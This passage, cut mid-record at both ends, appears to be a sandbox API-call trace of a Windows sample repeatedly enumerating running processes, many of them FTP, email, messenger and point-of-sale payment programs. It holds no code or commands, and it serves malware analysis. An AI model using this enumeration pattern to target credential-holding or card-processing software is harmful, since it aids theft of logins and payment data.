th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0150.738] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0150.741] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0150.744] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0150.746] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0150.749] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0150.752] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0150.758] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0150.762] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0150.765] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0150.767] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0150.769] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0150.773] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0150.775] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0150.804] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0150.807] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0150.809] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0150.811] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0150.814] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0150.816] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0150.819] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0150.821] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0150.824] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0150.827] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0150.829] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0150.832] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0150.834] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0150.837] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0150.843] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0150.846] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0150.848] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0150.851] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0150.853] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0150.856] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0150.858] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0150.860] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0150.863] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0150.865] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0150.867] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0150.870] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0150.872] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0150.874] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0150.877] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0150.881] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0150.883] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0150.884] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0150.886] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0150.888] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0150.891] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0150.893] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0150.895] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0150.897] CloseHandle (hObject=0x1460) returned 1 [0150.897] Sleep (dwMilliseconds=0x64) [0151.039] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a28 [0151.055] Process32First (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.057] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.059] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.061] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.063] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.065] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.066] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.068] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.070] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.072] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.074] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.155] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.157] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.158] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.160] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.162] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.164] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.165] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.167] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.169] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.170] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0151.172] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.175] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0151.176] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.178] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0151.179] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0151.181] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0151.183] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0151.185] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0151.187] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0151.188] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.259] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0151.261] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0151.263] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, 